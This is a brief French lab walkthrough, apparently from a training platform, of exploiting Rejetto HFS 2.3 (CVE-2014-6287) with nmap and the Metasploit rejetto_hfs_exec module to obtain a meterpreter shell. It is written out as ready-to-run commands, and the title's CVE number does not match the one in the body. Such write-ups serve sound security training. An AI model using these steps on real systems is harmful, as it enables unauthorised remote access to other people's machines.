
Metasploit RCE on HFS 2.3 - CVE-2014-62
Metasploit RCE sur HFS 2.3 - CVE-2014-62
🔖 Titre du projet
> Exécution de code à distance via HTTP File Server (HFS 2.3)
⚙ Outils utilisés • Kali Linux • Nmap • Metasploit • Cible : HFS 2.3 sur Windows 7
🔐 Détails de la vulnérabilité • Nom : CVE-2014-6287 • Type : Exécution de code à distance • Cause : Entrée non validée dans les scripts HFS • Impact : Accès shell non authentifié
🔍 Méthodologie (étape par étape)
🔹 Étape 1 : Collecte d'informations (Nmap)
• nmap -sV demo.ine.local (ip de la cible)
• Port ouvert trouvé : 80
• Service : rejetto HTTP file server 2.3

🔹 Étape 2 : Exploitation (Metasploit)
• Msfconsole
• Rechercher HFS ou rejetto
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run
Exploit
🔹 Étape 3 : Post-exploitation
après l'exécution, vous obtiendrez une session meterpreter utilisez la commande : shell
• whoami • ipconfig • dir

